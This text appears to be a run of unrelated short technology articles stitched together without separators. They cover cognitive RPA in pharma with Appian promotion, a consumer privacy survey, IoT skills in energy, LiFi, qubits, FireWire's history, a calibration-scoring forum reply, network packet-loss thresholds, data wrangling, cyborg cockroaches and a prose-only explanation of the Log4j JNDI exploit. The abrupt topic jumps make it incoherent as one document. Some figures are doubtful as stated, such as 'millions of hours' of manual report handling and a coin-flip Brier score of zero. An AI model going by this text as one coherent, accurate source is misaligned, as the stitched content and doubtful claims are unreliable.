AI-enhanced RPA platforms that automate various organizational workflows and processes either in whole or in part, referred to as CRPA - cognitive robotic process automation - are gradually becoming the norm, in yet another example of how truly pervasive digital transformation has become across multiple segments of both the public and private sectors.

Without a doubt, the business of pharmaceutical development and production is one of the most highly regulated sectors in the world, in no small part because it's characterized by numerous complex processes. One mistake in the chemical formulation of a particular drug - or a flaw in the physical steps of manufacturing tablets, capsules, liquids or other forms of medication - can lead to illnesses and even deaths among users, which can open up the drug company responsible to a surfeit of civil or even criminal penalties, in addition to various regulatory sanctions. Because of this, it's of the utmost importance for pharmaceutical businesses to implement numerous fail-safes in their BPM practices, and the combination of RPA and AI can help provide these precautionary measures.

According to Robotics and Automation News, major companies in this field may well consider this path in light of the success recently seen by AstraZeneca, one of the world's biggest pharmaceutical producers, when it commissioned the services of Deloitte in pursuit of an RPA implementation. While this would by no means be the first time that an organization within the general sphere of health care adopted RPA, CRPA, AI or some combination thereof, no one in the pharmaceutical field had tried using such technologies to handle the specific task of "adverse event reports." Other pharma businesses might use a different term for these filings, but the meaning is likely the same: reports of detrimental side effects in patients who have used a particular drug. Cognitive RPA improved the adverse event reporting processes of a major pharma company.
AstraZeneca receives an average of 100,000 adverse event reports each year - many documenting minor ailments but some detailing serious illnesses. Before the firm enlisted a major business solutions provider to devise an advanced RPA system for this purpose, it dealt with these reports manually. As such, members of the AstraZeneca patient safety team were spending millions of hours every year personally administering whatever tasks were necessary to ensure patients' adverse experiences were dealt with appropriately. Because individuals' health is at stake in such cases, care and sensitivity are essential - not to mention the initiation of any adjustments that can be made to the drug - but certain routine administrative processes could be (and were) automated through the RPA platform.

Robotics and Automation News noted that this RPA use case was a considerable success, bolstering response rates from both health care professionals involved in drug trials and AstraZeneca staff. Although similar solutions will have to undergo rigorous compliance testing via computer systems validation, as this one did, high-level CRPA application platforms will likely be adopted more broadly throughout the sector.

According to a January 2018 study conducted by Capgemini, 24 percent of surveyed individuals stated that they would, given the opportunity, use voice-activated digital assistants or chatbots to complete various purchases rather than doing so through direct interaction with a website. Additionally, the research found that Amazon Alexa, Google Assistant, Apple's Siri and IBM's Watson, along with any other similar applications that will likely emerge in the next three years, will stake claims as a dominant channel of commerce for average consumers.
Even if voice-activated assistants don't quite reach heights that can be considered "dominance," it's practically a given that they'll grow in popularity between now and 2021 or 2022, as their price points go down and they become accessible to a wider range of customers. The symbiotic operation of RPA and AI grants these systems their effectiveness. An AI platform, as present in any of the aforementioned assistants, can generally understand a typical human question or command - "Siri, set a timer for two hours," or "Alexa, what's the current record of the Boston Celtics?" - but an RPA cannot. Conversely, the AI can't complete the nuts-and-bolts processes handled by the RPA. When combined, however, the AI translates the voice command into a series of simpler signals, sends them to the RPA as requests to locate relevant data packets, receives this data and finally converts it into a natural response: "Timer set for two hours," "The Boston Celtics are 9-8, 6th place in the NBA Eastern Conference" and so on.

As RPA and AI develop further in the years to come, their capabilities will grow: AIs will potentially catch on to the slang and syntax of their users instead of requiring that questions be asked in formal sentences, while RPAs grow capable of collecting more complex requests based on prompts. As a result, their fusion can only bring about greater advances, in voice assistant technology and much, much more.

It's not uncommon for employees to fear that automation will marginalize or eliminate their jobs. However, as Forbes Technology Council contributor Kris Fitzgerald points out, this may not be the case in most industries: Hybrid RPA and AI systems take the burden of paperwork, data entry and other time-consuming tasks away from employees - particularly those dealing with customer service, in numerous sectors - and therefore allow them to put their intrapersonal skills to greater use.
Fitzgerald noted that hotels have seen a great deal of success employing RPA and AI together for various customer-facing needs, and that managing invoice processing represents another notably broad use case for these united technologies.

Excited as you may be to implement united RPA and AI tools throughout your business, it's critical that your staff have easy access to these functions and can fit them naturally into their individual workloads. Appian's high-speed, low-code application development platform allows enterprises to quickly craft the sort of apps and portals that simplify the use of these advanced tools across the workforce and help employees leverage their benefits quickly and efficiently.

Appian is the unified platform for change. We accelerate customers' businesses by discovering, designing, and automating their most important processes. The Appian Low-Code Platform combines the key capabilities needed to get work done faster, Process Mining + Workflow + Automation, in a unified low-code platform. Appian is open, enterprise-grade, and trusted by industry leaders.
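The voice-assistant flow described earlier, where the AI layer turns an utterance into simpler signals and the RPA layer mechanically fetches data, can be sketched as a toy pipeline. The intents and the sample data store here are invented purely for illustration:

```python
# Toy "AI" layer: map a free-form command to a structured intent.
def parse_command(utterance: str) -> dict:
    text = utterance.lower()
    if "timer" in text:
        return {"intent": "set_timer", "argument": text}
    if "record" in text:
        return {"intent": "lookup_record", "argument": text}
    return {"intent": "unknown", "argument": text}

# Toy "RPA" layer: mechanical retrieval of the requested data packet.
SPORTS_DATA = {"lookup_record": "9-8, 6th place"}  # invented sample data

def fetch(intent: dict) -> str:
    return SPORTS_DATA.get(intent["intent"], "no data")

# Back through the AI layer: convert raw data into a natural response.
def respond(utterance: str) -> str:
    intent = parse_command(utterance)
    if intent["intent"] == "lookup_record":
        return f"The record is {fetch(intent)}."
    if intent["intent"] == "set_timer":
        return "Timer set."
    return "Sorry, I didn't understand that."

print(respond("what's the current record of the Celtics?"))
```

Neither half is useful alone: the parser produces structured requests it cannot fulfill, and the retrieval layer answers requests it cannot interpret, which is the symbiosis the article describes.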
Internet users in the United States are dangerously ignorant about the type of data that website owners collect from them and how that data is used, making them vulnerable to fraud and misuse of their personal information, a new study finds. For the study, titled "Open to Exploitation: American Shoppers Online and Offline," 1,500 adult U.S. Internet users were asked true-or-false questions about topics such as website privacy policies. The survey was conducted by the University of Pennsylvania's Annenberg Public Policy Center and released last month. Respondents generally failed the test, answering an average of seven out of 17 questions correctly. The study's interviews, conducted between early February and mid-March, yielded findings the authors consider alarming, including:

49% can't identify "phishing" scam e-mail messages, whose designs mimic the legitimate companies they purport to represent in order to lure users into entering sensitive information such as Social Security numbers.

68% can't name any of the three credit reporting agencies that enable consumers to monitor for attempts at identity theft.
New research from satellite communications provider Inmarsat suggests that a skills gap in fields such as data security, analytical data science and technical support could put the brakes on IoT innovation in the energy sector.

According to the latest research from Inmarsat, more than a third of energy companies lack the skills they need to successfully deploy IoT technology. That statistic applies at both management and delivery levels. The conclusion, then, is that a recruitment drive is needed if IoT technology is to bring about innovation, efficiency and productivity in the energy industry. The independent research commissioned by Inmarsat found that the level of unpreparedness was remarkably high, despite the fact that the vast majority of energy companies are planning IoT applications.

Energy industry is lacking IoT skills

On behalf of Inmarsat, market research specialist Vanson Bourne interviewed respondents from 100 international energy companies. Specifically, they found that while 88 percent aim to deploy IoT technologies before the end of 2019, many currently lack the skills needed to do so effectively. In fact, more than one third (35 percent) believe that they lack the management skills to fully utilize IoT, while 43 percent reported a skills shortage at a delivery level. The majority (53 percent) stated that they would benefit from additional skills at a strategic level to take full advantage of IoT. These skills shortages were most prevalent in cyber security (54 percent) and technical support (49 percent). Respondents also pointed to analytical and data science as areas of high demand.

Energy companies without the required skills will fail to realize benefits of IoT

The complexity of the IoT stretches from installation and implementation to data analysis. A highly-skilled workforce is needed to get these systems in place, maintain them and make the best use of them.
Chuck Moseley, senior director for energy at Inmarsat Enterprise, said: "Whether they work with fossil fuels or renewables, IoT offers energy companies the potential to streamline their processes and reduce costs in previously unimagined ways. Smart sensors, for example, can facilitate the collection of information at every stage of production, enabling them to acquire a higher level of intelligence on how their operations are functioning and to therefore work smarter, more productively and more competitively."

"But fully realizing these benefits depends on energy companies' access to appropriately-skilled members of staff, and it is clear from our research that there are considerable skills gaps in the sector at all stages of IoT deployment."

Crucially, the need for skills in IoT will increase in the coming years as more companies adopt emerging technologies. "IoT is set to have a similarly transformative effect on a whole swathe of industries, so it's likely that the pressure on skills will only increase," he said. "Energy companies who currently lack these capabilities in-house will find themselves in a heated recruitment battle for this talent, with Silicon Valley, in particular, offering an attractive alternative."

The challenge for energy companies: upskill, attract or rely on partners

Moseley also highlighted the role that partners could play in addressing the deficiencies facing many energy companies. "There are undoubtedly steps that energy companies can and should take to upskill their staff and attract fresh talent with the appropriate skills, but the growing demand in the market for these skills means that bottlenecks will be hard to avoid altogether."

"This will make partners, who have greater economies of scale and more concentrated expertise on their side, critical for those looking to exploit IoT technologies, and it is here that energy companies should focus their efforts to supply the skills that they lack."
In October 2020, Getac became the world's first manufacturer to bring integrated LiFi technology to the rugged computing market. Its industry-leading UX10 fully rugged tablet integrates this capability, powered by pureLiFi. The innovation marked a critical turning point in the evolution of rugged computing. This exciting new technology gives customers an entirely new way to operate and communicate with unrivaled speed, security and reliability. This two-part blog series explores LiFi technology and how it works before discussing critical industry applications used worldwide.

A powerful new way to communicate

LiFi technology was first demonstrated to a captivated audience in 2011, when Professor Harald Haas presented the innovation as part of a world-renowned TED Global talk. It was clear from the outset that LiFi could completely revolutionize the wireless communication market, and Professor Haas established pureLiFi with co-founder Dr. Mostafa Afgani the following year. Since then, the pureLiFi team has spent much of the last decade turning that potential into commercial reality.

How does LiFi work?

LiFi technology harnesses the power of solid-state lighting, such as light-emitting diodes (LEDs), to transmit data without radio frequencies. LEDs are semiconductors that can be modulated at extremely high rates. These modulations are undetectable to the human eye but can be identified and decoded by a photodetector. As a result, anywhere there are LEDs, there is the potential to have LiFi-based data transfer and communication in the future. The technology is highly versatile, working indoors, outdoors, in bright sunlight and even in low-light conditions. What's more, LiFi can utilize the entire light spectrum, including infrared, meaning illumination isn't even needed for operation.

Security is one of the most significant advantages that LiFi technology offers over conventional WiFi solutions. WiFi data signals travel in all directions, including through walls and ceilings.
However, the unique characteristics of light mean LiFi signals are much more controllable. LiFi data can be easily contained in a single room or even a defined cone of light. This makes it inherently secure. Furthermore, LiFi has virtually no electromagnetic signature, meaning nearby hackers can't penetrate or detect networks. LiFi access points can even look like regular lights and are therefore practically invisible.

Of course, the benefits don't end with speed and security. LiFi signals also boast 3,000 times the density of WiFi signals, offering an unparalleled user experience. At the same time, ultra-low latency makes LiFi ideally suited to augmented reality and virtual reality applications.

A new dawn for wireless communications

While LiFi technology is new, its coming impact is clear. Getac and pureLiFi are showing first-hand what it can do for businesses and their long-term data strategies. Part two of this series will explore real-life practical applications, including sectors where LiFi will have a significant impact in the next few years. Stay tuned!
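The modulation idea described above, switching an LED on and off far faster than the eye can follow, can be sketched as simple on-off keying. Real LiFi systems use far more sophisticated schemes (such as multicarrier modulation); this is only a conceptual illustration:

```python
def encode_ook(data: bytes):
    """Encode bytes as on/off LED states, one light pulse per bit."""
    bits = []
    for byte in data:
        for position in range(7, -1, -1):        # most significant bit first
            bits.append((byte >> position) & 1)  # 1 = LED on, 0 = LED off
    return bits

def decode_ook(bits):
    """Recover bytes from the photodetector's sampled light levels."""
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for bit in bits[i:i + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)

pulses = encode_ook(b"LiFi")
assert decode_ook(pulses) == b"LiFi"  # round trip through the light channel
```

At a sufficiently high pulse rate, the on/off pattern is invisible to a human observer but trivially recoverable by a photodetector sampling at the same rate.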
Comparing an atom to a coin is like comparing a human heart to a repeatedly clenching fist. The analogy is woefully simplistic in relation to what is actually going on. But someone with a layman's understanding of the human body is unlikely to grasp the nuances of the human heart. Similarly, someone whose understanding of physics is derived from high school science class is unlikely to grasp the quantum world. So despite its shortcomings, a coin may be an apt description. Or at least the most apt description this side of the Heisenberg Uncertainty Principle.

So: When someone flips a coin, it will land on either heads or tails. These are the two, and only two, possible outcomes while the coin is in the air. In that sense, a coin is akin to classical computing. Information is stored in a string of 0s and 1s (a string, that is, of heads and tails). Together, the 0s and 1s form bits, and these bits, when aligned in certain sequences, dictate the functions that a machine is to perform, be it sending a text message or opening up Microsoft Word.

A Huge Little Difference

Machines that use quantum technology, however, have a different type of bit. Unlike a conventional bit, a quantum bit, or "qubit," has the physical properties of an atom. And because of atoms' ability to be in dual states, a qubit can simultaneously be 0 and 1. So while conventional computers are governed by a rigid series of mutually exclusive 0s and 1s, a quantum computer is built with qubits that can be 0 and 1 at the same time. A qubit, in this sense, is a coin resting on its edge, capable of going either way and, as a result, performing at a higher level than conventional bits.

"A coin on its side gives you the option of going either way," said John Martinis, a physics professor at the University of California, Santa Barbara, speaking in colloquial terms about a colossal concept. "It provides a range of possibilities that usually aren't possible," he told TechNewsWorld.
And this versatility is one of the reasons quantum technology is going to open previously unopened doors — or, more accurately, build doors where doors previously didn't exist.

Dueling With Dual Nature

Increased possibilities or no, a coin on its edge is nonetheless fragile, constantly in a state of wanting to topple over. Thus, while the dual possibilities of qubits unleash fantastic computational capabilities, this fragility poses a daunting challenge. "You want to extract that richness, but you don't want to lose the stability," Martinis said. "We need to be able to control something, to control the quantum state, but at the same time we don't want to have other things that cause the state to change."

This quandary has mandated its own area of study, some of which is taking place some 5,500 miles away from Santa Barbara, in Denmark. That's where Jacob Sherson, a professor and researcher at Aarhus University, is trying to perfect a type of laser, or "tweezer," that can manipulate the movement of these otherwise fragile atoms. "The tweezer," Sherson told TechNewsWorld, "is a tool to make atoms interact with one another. We are able to point the tweezer at a single atom and control it, make it do what we want. Now we want to do that with more and more atoms."

Owing to the fact that qubits have the physical properties of an atom — that they can simultaneously be 0 and 1 — each additional atom doubles the number of possible operations. This results in an exponential increase in the power of a quantum device. As Sherson writes, "30 quantum bits can allow a billion (10^9) operations at once, whereas a gate with 30 classical bits still does only one operation." Current computing devices compensate for this limitation by cramming billions of transistors into a single chip, allowing for myriad functions by virtue of volume. Quantum technology wouldn't need this volume, however, because each individual qubit is so powerful.
And this, according to Mark Ketchen, the manager of physics of information at IBM's TJ Watson Research Center, will bring about seismic shifts in computing power. "You don't need several billion qubits to perform functions on a quantum computer," Ketchen said. "You would only need a small number. Maybe it'd be in the hundreds or thousands, but certainly not billions. So we are creating something that is orders of magnitude less and orders of magnitude faster."
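The exponential scaling Sherson describes can be made concrete with a bare-bones statevector sketch: an n-qubit register needs 2^n amplitudes, so each added qubit doubles the state that must be tracked, and a Hadamard gate is one way to put a qubit into an equal mix of 0 and 1. This is a toy illustration, not a practical simulator:

```python
import math

def hadamard(state, target):
    """Apply a Hadamard gate to one qubit of a statevector, mixing its
    0 and 1 components into an equal superposition."""
    h = 1 / math.sqrt(2)
    new_state = state[:]
    for i in range(len(state)):
        if not (i >> target) & 1:          # visit each amplitude pair once
            j = i | (1 << target)
            a, b = state[i], state[j]
            new_state[i] = h * (a + b)
            new_state[j] = h * (a - b)
    return new_state

n_qubits = 3
state = [0.0] * (2 ** n_qubits)  # 2**n amplitudes: doubles with every qubit
state[0] = 1.0                   # start in the all-zeros basis state
for qubit in range(n_qubits):
    state = hadamard(state, qubit)

# All 8 basis states now carry equal amplitude, 1/sqrt(8) each: the
# register holds every classical bit pattern "at the same time."
print(state)
```

At 30 qubits the same list would need 2^30 (roughly a billion) amplitudes, which is exactly the scaling behind Sherson's comparison.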
FireWire is proof that a great idea doesn't always mean success. Richard Moss at Ars Technica runs through the rise and fall of this formidable data transfer standard. Some highlights that jumped out to me: the connector was based on the original Game Boy connector, down to the pins. The original working name of the standard was ChefCat. Sony didn't use the name "FireWire" in Japan because they thought it made Sony sound boring. And it shows that FireWire was poised to be what USB ended up becoming: the ubiquitous data transfer protocol and port. Instead, the move from a one-time $50,000 license fee to a $1 fee per FireWire port pushed Intel off the standard and all but spelled its doom in PCs. It's a really interesting read and gives some love to a forgotten but innovative connector.

Ars Technica comments:

The rise and fall of FireWire—IEEE 1394, an interface standard boasting high-speed communications and isochronous real-time data transfer—is one of the most tragic tales in the history of computer technology. The standard was forged in the fires of collaboration. A joint effort from several competitors including Apple, IBM, and Sony, it was a triumph of design for the greater good. FireWire represented a unified standard across the whole industry, one serial bus to rule them all. Realized to the fullest, FireWire could replace SCSI and the unwieldy mess of ports and cables at the back of a desktop computer. Yet FireWire's principal creator, Apple, nearly killed it before it could appear in a single device. And eventually the Cupertino company effectively did kill FireWire, just as it seemed poised to dominate the industry. The story of how FireWire came to market and ultimately fell out of favor serves today as a fine reminder that no technology, however promising, well-engineered, or well-liked, is immune to inter- and intra-company politics or to our reluctance to step outside our comfort zone.
Originally posted on http://www.howtomeasureanything.com/forums/ on Wednesday, July 08, 2009 2:46:05 PM by

"I want to share an observation a V.P. made after doing the 10 pass/fail questions. If one was to input 50% confidence to all the questions and randomly selected T/F, they would be correct 1/2 the time; the difference would be 2.5. The scoring would indicate that that person was probably overconfident. Can you help here? I am considering making the difference between the overall series of answers (as a decimal) and the correct answers (as a decimal) as needing to be greater than 2.5 for someone to be probably overconfident. Thanks in advance – Hugh"

Yes, that is a way to "game the system," and the simple scoring method I show would indicate the person was well calibrated (but not very informed about the topic of the questions). It is also possible to game the 90% CI questions by simply creating absurdly large ranges for 90% of the questions and ranges we know to be wrong for 10% of them. That way, they would always get 90% of the answers within their ranges. If the test-takers were, say, students who simply wanted to appear calibrated for the purpose of a grade, then I would not be surprised if they tried to game the system this way. But we assume that most people who want to get calibrated realize they are developing a skill they will need to apply in the real world. In such cases they know they really aren't helping themselves by doing anything other than putting their best calibrated estimates on each individual question.

However, there are also ways to counter system-gaming even in situations where the test taker has no motivation whatsoever to actually learn how to apply probabilities realistically. In the next edition of How to Measure Anything I will discuss methods like the "Brier score," which would penalize anyone who simply flipped a coin on each true/false question and answered them all as 50% confident.
In a Brier Score, the test taker would have gotten a higher score if they put higher probabilities on questions they thought they had a good chance of getting right. Simply flipping a coin to answer all the questions on a T/F test and calling them each 50% confident produces a Brier score of zero. Thanks for your interest,
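The scoring logic can be sketched with the standard form of the Brier score (mean squared error between stated probability and outcome, where lower is better). Under this form, the coin-flip strategy scores a constant 0.25 per question no matter the outcomes, so it gains nothing from actual knowledge; the variant described above is evidently rescaled so that this baseline comes out to zero, but the comparison works the same way:

```python
def brier_score(forecasts):
    """Mean squared error between the stated probability of 'true' and
    the actual outcome (1 = true, 0 = false). Lower is better."""
    return sum((p - outcome) ** 2 for p, outcome in forecasts) / len(forecasts)

# Gaming strategy: flip a coin, state 50% on every question.
coin_flipper = [(0.5, 1), (0.5, 0), (0.5, 1), (0.5, 0)]

# Informed, calibrated respondent: confident answers, mostly correct.
informed = [(0.9, 1), (0.9, 1), (0.9, 1), (0.2, 0)]

print(brier_score(coin_flipper))  # always 0.25, regardless of outcomes
print(brier_score(informed))      # lower (better) score
```

Because (0.5 - outcome)^2 is 0.25 whichever way the question goes, the only way to improve the score is to state higher probabilities on questions one actually gets right, which is exactly the behavior the scoring is meant to reward.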
How to Manage Interface Packet Loss Thresholds

Interface packet loss provides indications of link problems that shouldn't be ignored. But then you have to decide on an alerting threshold that indicates a problem without creating too many false alerts. So, what's there to do? Allow me to explain.

Causes of Packet Loss

Packet loss results in packet retransmissions that consume multiple round-trip times, leading to significantly lower application throughput, in other words, application slowness. Real-time protocols are generally more tolerant of small amounts of random packet loss. However, they don't work well with bursts of packet loss, and certainly not when the packet loss gets too high.

Link and Interface Errors

Link and interface errors can have many sources. Fiber-based networks are subject to anything that reduces the optical signal, such as dirty, high-loss connections and fibers that are pinched or stretched. Copper cabling, most often twisted pair, has its own set of failure modes, including poorly crimped connectors, cable runs close to high-voltage sources, or pinched cables. Wireless networks are known for a variety of limitations that create packet loss, such as overloaded access points, radio frequency (RF) interference from non-Wi-Fi sources like microwave ovens, and poor RF signal strength. You should treat interface errors as a soft infrastructure failure—they affect applications in subtle ways.

Network congestion occurs where network devices (including host interfaces) run out of buffer space and must drop excess packets. The intuitive action is to increase buffering, but that negatively affects congestion control algorithms, to the point that it has a name: buffer bloat.
Interface drops (sometimes called discards) aren't necessarily a bad thing. Congestion can occur at aggregation points or where link speed changes occur. It becomes a problem when it occurs too frequently and the packet loss causes applications to become slow. Quality of service (QoS) gets used in these cases to prioritize crucial, time-sensitive traffic flows and force packet drops of less important packets. We have successfully used QoS to prioritize business applications over less important entertainment traffic (streaming audio).

A Surprisingly Low Threshold

So, you want to configure your network management platform to alert you to potential sources of packet loss that impact application performance. What's a reasonable figure to use for an alerting and reporting threshold? You would think that one percent would suffice, based on our intuition developed in other disciplines, like finance. However, that intuition is flawed when applied to networking.

The transmission control protocol (TCP) is very sensitive to packet loss. Some researchers measured TCP performance at different speeds and packet loss characteristics, and the result is known as the Mathis Equation. The short summary is that packet loss of more than .001% of all packets causes significant decreases in throughput. That's a packet loss rate of one packet out of 100,000 (1 out of 10E5). That translates into a bit error rate (BER) of about 10E-10. (The figures are approximate because of differences in packet sizes.)

Before you say that this error threshold is too small, let's look at it differently. How long do you think a link should run before it experiences a packet loss? Using the 10E-10 figure, a one gigabit per second (1Gbps) link would run about 10 seconds between errors, while a 10Gbps link would experience an error every second. You can use this information to determine your network management system packet loss thresholds.
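The arithmetic behind these figures can be sketched in a few lines of Python. The packet size (MSS), round-trip time, and the Mathis constant below are illustrative assumptions; as noted above, the exact figures depend on packet sizes.

```python
# Sketch of the packet-loss arithmetic above. The MSS, RTT, and the
# constant C ~ 1.22 (standard TCP) are illustrative assumptions.

def seconds_between_errors(link_bps, ber):
    """Mean time between bit errors on a link running at full rate."""
    return 1.0 / (link_bps * ber)

def mathis_throughput_bps(mss_bytes, rtt_s, loss_rate):
    """Mathis estimate: throughput <= (MSS / RTT) * (C / sqrt(p))."""
    C = 1.22
    return (mss_bytes * 8 / rtt_s) * (C / loss_rate ** 0.5)

if __name__ == "__main__":
    ber = 1e-10
    print(f"1 Gbps:  {seconds_between_errors(1e9, ber):.0f} s between errors")
    print(f"10 Gbps: {seconds_between_errors(1e10, ber):.0f} s between errors")
    # TCP throughput collapses quickly as loss rises past ~0.001%.
    for p in (1e-5, 1e-4, 1e-2):
        mbps = mathis_throughput_bps(1460, 0.05, p) / 1e6
        print(f"loss {p:.0e}: ~{mbps:.0f} Mbps")
```

Running the sketch reproduces the article's figures: about 10 seconds between errors at 1Gbps with a 10E-10 BER, one second at 10Gbps, and a sharp throughput drop as loss climbs.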
Network Management Thresholds

Network management systems (NMS) should be collecting interface performance data from all network interfaces within the organization, including errors and drops/discards. Your selection of an alerting threshold for errors/drops/discards will depend on what error rates you are willing to tolerate for your network and what threshold setting the network management tools will support. I was recently surprised to find an NMS in which packet drop thresholds couldn't be set smaller than one percent. In these cases, it may be better to use absolute count values as thresholds. Also, note that management systems typically count errors separately from drops/discards.

Regardless of the exact threshold, you should configure the NMS to use Top-N reports (e.g., Top-10) of the interfaces with the highest number of errors and drops. You can then focus on diagnosing the interfaces that have the most impact on applications. Note that some interfaces will have errors/drops but aren't handling much traffic. I've seen cases where packet loss on a link was nearly 100%, but it was for a minimal number of packets. Beware: some of these paths are likely to be backup links that will have high loads if the primary fails. It's risky to ignore these problems. You should create synthetic loads between network devices to verify their integrity.

Let's examine an actual link error situation in which I was talking with a network engineer at a major financial services firm. The network engineering team couldn't make network changes; that was reserved for the network operations team. Some key applications were slow, and the engineer had determined that it was due to a duplex mismatch on a router-to-router link. But because packet loss was one percent, the operations team ignored it, looking for some other cause. It took the engineer several weeks to convince the operations team to fix the problem, whereupon the applications immediately returned to the desired performance.
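A Top-N errors/drops report of the kind described above can be sketched as follows. The interface names and counter values are invented for illustration; a real NMS would populate them from SNMP counters (e.g., ifInErrors and the discard counters) or a telemetry feed.

```python
# Minimal sketch of a Top-N report from polled interface counters.
# The interface names and counts are invented for illustration only.

def top_n_by_errors(counters, n=10):
    """Rank interfaces by combined errors + drops, highest first."""
    def total(stats):
        return stats.get("errors", 0) + stats.get("drops", 0)
    return sorted(counters.items(), key=lambda kv: total(kv[1]), reverse=True)[:n]

polled = {
    "core1:Gi0/1": {"errors": 4821, "drops": 12},
    "edge3:Te1/0/4": {"errors": 3, "drops": 150944},
    "access7:Gi0/24": {"errors": 0, "drops": 2},
}

for name, stats in top_n_by_errors(polled, n=2):
    print(name, stats)
```

In practice you would also track traffic volume per interface, so that an interface with high loss but negligible traffic (such as an idle backup link) can be recognized rather than dismissed.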
Digital Experience and Application Performance Monitoring

Packet loss monitoring and analysis gets tricky with cloud-based applications. You don't have network management visibility into the server-side network statistics. There are two potential alternatives:

- digital experience (DX) monitoring products
- application performance monitoring (APM) systems

DX products can include a client-based monitoring system that collects important client-side data like Wi-Fi signal strengths and packet retransmissions. Application performance monitoring products monitor application performance, frequently by performing packet captures at points between the application servers and the client endpoints. A bit of setup to identify applications and client endpoints makes it easy for these systems to detect a variety of problems, including client-side slowness, network retransmissions (due to packet loss), and slow application servers.

You have a wide variety of tools to monitor for packet loss, even extending to cloud-based applications. Setting appropriate thresholds on network error and drop counters will provide you with visibility into how well your infrastructure is running.
What Is Data Wrangling?

Organizations deal with large amounts of raw data, and preparing it for analysis can be time-consuming and costly. Wrangling alleviates that burden by transforming, cleansing, and enriching data to make it more applicable, consumable, and useful. Unlike data pre-processing or preparation, wrangling happens throughout the analysis and model-building stages of the data analytics process. Wrangling improves the quality of the data being analyzed, which means that rather than waste time and resources dealing with the consequences of bad data, organizations can create accurate, meaningful analyses that allow for better solutions, decisions, and outcomes.

How Data Wrangling Works

Data wrangling follows five major steps: explore, transform, cleanse, enrich, and store.

The Future of Data Wrangling

Data wrangling used to be handled by developers and IT experts with extensive knowledge of database administration and fluency in SQL, R, and Python. Analytic Process Automation (APA) has changed that, getting rid of cumbersome spreadsheets and making it easy for data scientists, data analysts, and IT experts alike to wrangle and analyze complex data.

Getting Started With Data Wrangling

The Alteryx APA Platform™ uses a graphical interface, so it's easy to document, share, and scale critical data wrangling work in a way that's auditable and repeatable. No-code, low-code modes allow users to either drag-and-drop or tackle one line of programming at a time. Users can also save their work in formats similar to a spreadsheet file or as part of a larger data model to a shared platform. The platform includes:

- Transformation tools, including Arrange, Summarize, and Transpose
- Preparation and cleansing tools, such as Formula, Filter, and Cleanse
- Data enrichment tools, including Location Insights, Business Insights, and Behavior Analysis
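As a minimal illustration of the five wrangling steps named above, here is a library-free Python sketch over invented sample records. In practice a platform such as Alteryx, or a library such as pandas, would do this work at scale.

```python
import json

# A minimal, library-free sketch of the five wrangling steps
# (explore, transform, cleanse, enrich, store) on invented sample data.

raw = [
    {"name": " Alice ", "spend": "120.50", "region": "EU"},
    {"name": "Bob",     "spend": "n/a",    "region": "US"},
    {"name": "carol",   "spend": "80",     "region": "EU"},
]

# Explore: understand the shape of the data and spot obvious problems.
assert {"name", "spend", "region"} <= set(raw[0])

# Transform + cleanse: trim whitespace, normalize case, drop bad values.
def cleanse(rec):
    try:
        spend = float(rec["spend"])
    except ValueError:
        return None  # unparseable spend value; drop the record
    return {"name": rec["name"].strip().title(), "spend": spend,
            "region": rec["region"]}

clean = [r for r in map(cleanse, raw) if r is not None]

# Enrich: add a derived field (a stand-in for business-insight tools).
for r in clean:
    r["tier"] = "high" if r["spend"] >= 100 else "standard"

# Store: persist in a consumable format for the analysis stage.
print(json.dumps(clean, indent=2))
```

The unparseable "n/a" record is dropped during cleansing, names are normalized, and the enrichment step adds a derived spending tier before the result is stored.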
Part insect, part machine – roboroach to the rescue!

Researchers say that remote-controlled cyborg insects could be used to inspect hazardous areas or monitor the environment.

Ruben was a cockroach captured for scientific experiments and turned into a cyborg. Upon his eventual escape, Ruben decided to use his robotic powers for good. That was the premise of RoboRoach, a Canadian kids' show that ran for two seasons in the early 2000s. It is now also a real-life fact, apparently.

A team of researchers at the RIKEN institute in Japan have engineered actual roboroaches. It is unclear whether the series inspired the research at all, but these robobugs, just like Ruben, were not built to act with free will either.

For cyborg insects to be practical, handlers must be able to control them remotely for long periods of time, which, according to the researchers, was easier said than done. Eventually, they found a way by attaching a solar cell to a rechargeable battery that powers a wireless control module. It sits on a cockroach like a tiny backpack.

"Keeping the battery adequately charged is fundamental – nobody wants a suddenly out-of-control team of cyborg cockroaches roaming around," RIKEN said, and was probably not wrong.

The researchers used Madagascan cockroaches for their study, which was published by npj Flexible Electronics, a scientific journal. Approximately 6cm long, they have a wider body surface to attach all the equipment needed to control their legs remotely and turn them left or right.

The study showed that despite all the mechanics they had to carry, cyborg cockroaches could still move freely thanks to ultrathin electronics and flexible materials used in the design. The rigid part of the device could be stably mounted on a cockroach's thorax for more than a month.

"Considering the deformation of the thorax and abdomen during basic locomotion, a hybrid electronic system of rigid and flexible elements in the thorax and ultrasoft devices in the abdomen appears to be an effective design for cyborg cockroaches," lead researcher Kenjiro Fukuda said.

Since abdominal deformation is not unique to cockroaches, the same design could be adapted to other insects, including flying ones – like cicadas.

Live bugs were used for this experiment, as opposed to a field of research that scientists at Rice University in Texas recently dubbed "necrobotics" after repurposing the body of a dead spider as a mechanical gripper.
It's no exaggeration to call the Log4j vulnerability one of the most severe cybersecurity crises in many years. A flaw in the widely popular open source Log4j software package, the Log4j CVE exposed a vast number of organizations worldwide to malware, including the mass recruitment of botnets for DDoS attacks.

As a zero-day vulnerability, the Log4j CVE may already have been exploited by cyber criminals before it was first reported to the Apache Software Foundation on November 24, 2021, or announced publicly on December 10, 2021. The unprecedented extent of the zero-day Log4j vulnerability has made remediation both critical and challenging. The Log4j CVE affects hundreds of millions of devices, from network servers and heavy industrial equipment to automobiles, printers, and smartphones, and popular services such as Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and Twitter, all of which must be updated to a new version of the software to avert a Log4j exploit.

First released in early 2001, Log4j is a subsystem for recording events such as error and status reports. Lightweight and easy to use, Log4j quickly became a common component of modern applications. However, the use of the Java Naming and Directory Interface (JNDI) in the package left it open to exploitation by criminals.

By sending fraudulent HTTP/HTTPS requests to log an event, and including a JNDI request in its header, an attacker might trick Log4j into querying the hacker's own LDAP server, which could then respond with directory data containing a malicious Java object. In this way, the Log4j exploit allows cyber criminals to launch remote code execution (RCE) attacks to obtain full access to the target computer.

The disclosure of the zero-day Log4j CVE sparked a dramatic response by cyber criminals, from Log4j exploit testing to active attacks.
